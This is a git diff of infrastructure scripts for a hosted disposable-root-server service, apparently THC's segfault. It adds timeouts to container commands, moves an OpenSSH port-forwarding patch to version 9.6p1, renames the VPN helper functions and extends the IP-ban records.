@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
|
||||
|
||||
clean:
|
||||
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
|
||||
docker image rm alpine-gcc
|
||||
rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
|
||||
docker image rm sf-alpine-gcc
|
||||
|
||||
|
|
|
@ -424,7 +424,7 @@ print_goodbye()
|
|||
|
||||
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
||||
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
||||
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||
n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||
[[ -z "$n" ]] && n=0
|
||||
[[ ${#n} -gt 5 ]] && n=0
|
||||
[[ ! $n -eq $n ]] && n=0
|
||||
|
@ -435,7 +435,7 @@ print_goodbye()
|
|||
str="process is"
|
||||
[[ "$n" -gt 1 ]] && str="processes are"
|
||||
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
||||
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||
exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||
echo -e "\
|
||||
-------> The encrypted filesystem in /sec will remain accessible until
|
||||
-------> the last shell exits or all background processes terminate.
|
||||
|
@ -443,16 +443,6 @@ print_goodbye()
|
|||
-------> This will also make /sec unavailabe until your next log in."
|
||||
fi
|
||||
echo -en "\r"
|
||||
[[ -z $SF_IS_PAYING ]] && {
|
||||
echo -e "\
|
||||
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
||||
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
|
||||
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
|
||||
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
|
||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
|
||||
|
||||
}
|
||||
|
||||
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
||||
|
||||
echo -e "\
|
||||
|
@ -536,7 +526,7 @@ spawn_shell_exit()
|
|||
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
||||
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
||||
# Request a reverse Port Forward
|
||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||
|
||||
|
||||
# Warn user if this is the last server by IP (after semaphore has been released)
|
||||
|
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
|
|||
# Setup container (within container's namespace)
|
||||
unset WGNAME_UP
|
||||
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
||||
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||
exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
||||
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
||||
|
||||
|
|
|
@ -11,11 +11,17 @@
|
|||
DSTDIR="/src/fs-root/usr/sbin"
|
||||
DSTBIN="${DSTDIR}/sshd"
|
||||
set -e
|
||||
SRCDIR="/tmp/openssh-9.2p1"
|
||||
SRCDIR="/src/dev/openssh-${VER:?}-sf"
|
||||
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
|
||||
cd /src/dev
|
||||
[[ ! -d "$SRCDIR" ]] && {
|
||||
# Cloudflare to often returns 503 - "BLOCKED"
|
||||
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||
wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
|
||||
tar xfz "openssh-${VER}.tar.gz"
|
||||
mv "openssh-${VER}" "openssh-${VER}-orig"
|
||||
tar xfz "openssh-${VER}.tar.gz"
|
||||
mv "openssh-${VER}" "${SRCDIR}"
|
||||
|
||||
cd "$SRCDIR"
|
||||
|
||||
|
@ -39,5 +45,5 @@ strip sshd
|
|||
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
||||
cp sshd "${DSTBIN}"
|
||||
chmod 755 "${DSTBIN}"
|
||||
rm -rf "${SRCDIR:?}"
|
||||
# rm -rf "${SRCDIR:?}"
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
|
||||
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05
|
||||
@@ -3639,7 +3639,7 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
|
||||
--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
|
||||
@@ -3683,7 +3683,7 @@
|
||||
ssh->chanctxt->IPv4or6 = af;
|
||||
}
|
||||
|
||||
|
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||
/*
|
||||
* Determine whether or not a port forward listens to loopback, the
|
||||
* specified address or wildcard. On the client, a specified bind
|
||||
@@ -3677,6 +3677,7 @@
|
||||
@@ -3721,6 +3721,7 @@
|
||||
* address and it was overridden.
|
||||
*/
|
||||
if (*listen_addr != '\0' &&
|
||||
|
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
||||
strcmp(listen_addr, "*") != 0) {
|
||||
ssh_packet_send_debug(ssh,
|
||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
|
||||
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17
|
||||
@@ -102,6 +102,12 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
|
||||
--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
|
||||
@@ -101,6 +101,12 @@
|
||||
/* requested tunnel forwarding interface(s), shared with session.c */
|
||||
char *tun_fwd_ifnames = NULL;
|
||||
|
||||
|
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
/* returns 1 if bind to specified port by specified user is permitted */
|
||||
static int
|
||||
bind_permitted(int port, uid_t uid)
|
||||
@@ -391,8 +397,10 @@
|
||||
@@ -388,8 +394,10 @@
|
||||
/* Clean up sessions, utmp, etc. */
|
||||
cleanup_exit(255);
|
||||
}
|
||||
|
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
if (conn_in_ready &&
|
||||
process_input(ssh, connection_in) < 0)
|
||||
break;
|
||||
@@ -637,12 +645,14 @@
|
||||
@@ -634,12 +642,14 @@
|
||||
|
||||
if (strcmp(ctype, "session") == 0) {
|
||||
c = server_request_session(ssh);
|
||||
|
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
}
|
||||
if (c != NULL) {
|
||||
debug_f("confirm %s", ctype);
|
||||
@@ -802,8 +812,20 @@
|
||||
@@ -799,8 +809,20 @@
|
||||
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
||||
} else {
|
||||
/* Start listening on the port */
|
||||
|
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||
}
|
||||
if ((resp = sshbuf_new()) == NULL)
|
||||
fatal_f("sshbuf_new");
|
||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
|
||||
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54
|
||||
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05
|
||||
@@ -536,8 +536,71 @@
|
||||
diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
|
||||
--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
|
||||
+++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
|
||||
@@ -531,8 +531,71 @@
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
|
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
|
|||
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
||||
{
|
||||
#ifdef DISABLE_FD_PASSING
|
||||
@@ -576,8 +639,34 @@
|
||||
@@ -571,8 +634,34 @@
|
||||
|
||||
reseed_prngs();
|
||||
|
||||
|
|
|
@ -47,6 +47,23 @@ Sanitize()
|
|||
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
||||
}
|
||||
|
||||
InitColors() {
|
||||
# COLOR is set (to 'always')
|
||||
Y=$CDY
|
||||
C=$CDC
|
||||
R=$CDR
|
||||
RR=$CR
|
||||
G=$CDG
|
||||
B=$CB
|
||||
M=$CDM
|
||||
YY=$CY
|
||||
W=$CW
|
||||
N=$CN
|
||||
F=$CF
|
||||
ICON_ERROR="💥 "
|
||||
ICON_WARN="💥 "
|
||||
}
|
||||
|
||||
GetFormVars()
|
||||
{
|
||||
local IFS
|
||||
|
@ -71,7 +88,6 @@ GetFormVars()
|
|||
[[ ${key} == "config" ]] && {
|
||||
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
||||
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
||||
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||
}
|
||||
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
||||
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
||||
|
@ -128,6 +144,9 @@ GetFormVars()
|
|||
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
||||
}
|
||||
done
|
||||
|
||||
[[ -n $COLOR ]] && InitColors
|
||||
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||
}
|
||||
|
||||
# Load PID of WireGuard container
|
||||
|
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
|
|||
|
||||
# The PortD add's a /sf/run/self/reverse_forward.
|
||||
echo -en "\
|
||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
|
||||
${M}🤭 Tip${N}: Type ${C}rshell${N}
|
||||
${G}👾 New reverse Port is ${Y}${ipport}${CN}"
|
||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
|
||||
${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
|
||||
${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
|
||||
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
|
||||
|
||||
# portd.sh automaticaly adds this to /config/self/reverse_*
|
||||
exit
|
||||
|
@ -807,22 +827,7 @@ cmd_wg_show()
|
|||
0<&- # Close STDIN
|
||||
Sanitize
|
||||
GetFormVars
|
||||
[[ -n $COLOR ]] && {
|
||||
# COLOR is set (to 'always')
|
||||
Y=$CDY
|
||||
C=$CDC
|
||||
R=$CDR
|
||||
RR=$CR
|
||||
G=$CDG
|
||||
B=$CB
|
||||
M=$CDM
|
||||
YY=$CY
|
||||
W=$CW
|
||||
N=$CN
|
||||
F=$CF
|
||||
ICON_ERROR="💥 "
|
||||
ICON_WARN="💥 "
|
||||
}
|
||||
|
||||
|
||||
|
||||
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
||||
|
@ -836,13 +841,13 @@ GetFormVars
|
|||
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
||||
[[ -n $SF_OVPN_HACK ]] && {
|
||||
wg_net_init
|
||||
[[ ${ARGS[1]} == 'vpn' ]] && {
|
||||
source "/sf/bin/funcs_vpn.sh"
|
||||
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up
|
||||
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show
|
||||
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del
|
||||
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
|
||||
cmd_vpn_help
|
||||
[[ ${ARGS[1]} == 'ovpn' ]] && {
|
||||
source "/sf/bin/funcs_ovpn.sh"
|
||||
[[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
|
||||
[[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
|
||||
[[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
|
||||
[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
|
||||
cmd_ovpn_help
|
||||
exit
|
||||
}
|
||||
}
|
||||
|
@ -869,14 +874,14 @@ wg_net_init
|
|||
exit
|
||||
}
|
||||
|
||||
[[ "${FCGI_CMD}" == "vpn" ]] && {
|
||||
source "/sf/bin/funcs_vpn.sh"
|
||||
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up
|
||||
[[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show
|
||||
[[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del
|
||||
[[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del
|
||||
[[ "${FCGI_CMD}" == "ovpn" ]] && {
|
||||
source "/sf/bin/funcs_ovpn.sh"
|
||||
[[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up
|
||||
[[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show
|
||||
[[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del
|
||||
[[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del
|
||||
# [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show
|
||||
cmd_vpn_help
|
||||
cmd_ovpn_help
|
||||
|
||||
exit
|
||||
}
|
||||
|
|
|
@ -19,7 +19,9 @@ USER_UL_RATE="$5"
|
|||
LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt"
|
||||
|
||||
# Create 'empty' for ZSH's prompt to show WG EXIT
|
||||
[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||
# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}"
|
||||
# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still.
|
||||
:>"${LID_PROMPT_FN}"
|
||||
|
||||
set -e
|
||||
LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}")
|
||||
|
|
|
@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252
|
|||
SF_MULLVAD_ROUTE=10.124.0.0/22
|
||||
SF_NOVPN_IP=172.20.0.240
|
||||
SF_NGINX_IP=172.20.1.80
|
||||
SF_RPC_IP=10.11.0.2
|
||||
SF_RPC_IP=100.126.224.2
|
||||
SF_GSNC_IP=172.22.0.21
|
||||
SF_SSHD_IP=172.22.0.22
|
||||
SF_DOH_IP=172.23.0.2
|
||||
|
@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16
|
|||
SF_NET_VPN=172.20.0.0/24
|
||||
SF_NET_VPN_DNS_IP=172.20.0.53
|
||||
|
||||
SF_NET_LG=10.11.0.0/24
|
||||
SF_NET_LG_ROUTER_IP=10.11.0.1
|
||||
SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254
|
||||
SF_NET_LG=100.126.224.0/22
|
||||
SF_NET_LG_ROUTER_IP=100.126.224.1
|
||||
SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254
|
||||
|
||||
SF_NET_VPN_ROUTER_IP=172.20.0.2
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow
|
|||
CG="\e[1;32m" # green
|
||||
CR="\e[1;31m" # red
|
||||
CC="\e[1;36m" # cyan
|
||||
# CM="\e[1;35m" # magenta
|
||||
CM="\e[1;35m" # magenta
|
||||
CW="\e[1;37m" # white
|
||||
CB="\e[1;34m" # blue
|
||||
CF="\e[2m" # faint
|
||||
|
|
|
@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest"
|
|||
_sf_basedir="/sf"
|
||||
_sf_dbdir="${_sf_basedir}/config/db"
|
||||
unset _sf_isinit
|
||||
_sf_region="$(hostname)"
|
||||
|
||||
_sf_deinit()
|
||||
{
|
||||
|
@ -507,27 +508,29 @@ lgrm()
|
|||
lgban()
|
||||
{
|
||||
local fn
|
||||
local hn
|
||||
local ip
|
||||
local msg
|
||||
local lid
|
||||
local lglid="${1}"
|
||||
|
||||
_sf_init
|
||||
lid="${1}"
|
||||
shift 1
|
||||
|
||||
fn="${_self_for_guest_dir}/${lid}/ip"
|
||||
fn="${_self_for_guest_dir}/${lglid}/ip"
|
||||
[[ -f "$fn" ]] && {
|
||||
ip=$(<"$fn")
|
||||
fn="${_self_for_guest_dir}/${lglid}/hostname"
|
||||
[[ -f "${fn}" ]] && hn=$(<"${fn}")
|
||||
fn="${_sf_dbdir}/banned/ip-${ip:0:18}"
|
||||
[[ ! -e "$fn" ]] && {
|
||||
[[ $# -gt 0 ]] && msg="$*\n"
|
||||
echo -en "$msg" >"${fn}"
|
||||
echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}"
|
||||
}
|
||||
echo "Banned: $ip"
|
||||
}
|
||||
|
||||
lgstop "${lid}" "$@"
|
||||
#_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||
lgstop "${lglid}" "$@"
|
||||
#_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server.
|
||||
|
||||
_sf_deinit
|
||||
}
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
[[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80))
|
||||
|
||||
cmd_vpn_help() {
|
||||
cmd_ovpn_help() {
|
||||
echo -en "\
|
||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N}
|
||||
Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N}
|
||||
|
@ -241,7 +241,7 @@ vpn_stop() {
|
|||
nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null
|
||||
}
|
||||
|
||||
cmd_vpn_show() {
|
||||
cmd_ovpn_show() {
|
||||
load_lg
|
||||
[[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && {
|
||||
echo -e "${C}"
|
||||
|
@ -252,12 +252,12 @@ cmd_vpn_show() {
|
|||
exit
|
||||
}
|
||||
|
||||
cmd_vpn_up() {
|
||||
cmd_ovpn_up() {
|
||||
local str
|
||||
load_lg
|
||||
local link_mtu
|
||||
|
||||
[[ -z "$R_CONFIG" ]] && cmd_vpn_help
|
||||
[[ -z "$R_CONFIG" ]] && cmd_ovpn_help
|
||||
WG_DEV="vpnEXIT"
|
||||
# echo "PID=$PID"
|
||||
|
||||
|
@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect.
|
|||
exit
|
||||
}
|
||||
|
||||
cmd_vpn_del() {
|
||||
cmd_ovpn_del() {
|
||||
load_lg
|
||||
|
||||
vpn_stop
|
Loading…
Reference in New Issue